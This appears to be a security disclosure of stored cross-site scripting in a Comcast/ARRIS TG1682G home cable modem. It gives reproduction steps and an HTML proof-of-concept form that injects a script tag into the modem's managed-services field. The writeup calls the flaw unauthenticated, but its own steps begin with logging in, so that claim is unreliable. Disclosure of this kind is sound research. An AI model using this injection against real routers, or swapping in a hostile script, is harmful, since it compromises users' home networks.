Comcast Cable Modem (Unathenticated Stored XSS)

Credit Nu11By73


Overview

Comcast home cable modem version TG1682G was identified by researchers to hold stored cross site scripting. This exploit is accessible without authentication by an attacker on the local network.

Device Description:
1 port residential gateway
Hardware Version:
eMTA & DOCSIS
Original Software Version:
10.0.59.SIP.PC20.CT
Software Image:
TG1682_2.0s7_PRODse
Advanced Services:
TG1682G

Exploitation Writeup

The Comcast ARRIS home cable modem was tested against many different vulnerabilities. This testing led to the identifcation of a stored cross site scripting vulnerbaility that could be exploited without authentication. Below is the proof of concept code that was used to issue an http post to the backend software.


Verification:

Managed Devices
1. Login to the modem
2. Click parental control
3. Click managed devices
4. Click add blocked device
5. In the custom device boxes type what is shown in the first image and click save
6. When the page refreshes you will see the popup




Managed Services
1. Click on the managed services button
2. Click on the add button next to blocked services
3. Enter the information shown in the first screen shot below and click save
4. Once the site is done rendering you will receive the pop up




Connected Devices
1. Click connected devices
2. Click add device with reserved ip
3. Add the information shown in the first screenshot below
4. Click save and wait for the page to refresh to receive the pop ups





Proof of concept code:
The code below was used to exploit the application.

Managed Services POC
<html>
<p>Unauth Stored XSS - Xfinity Modem</p>
<form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
<input type="hidden" name="service" value="test><script>alert(1)</script>" / >
<input type="hidden" name="protocol" value="TCP" / >
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />
</form>
</html>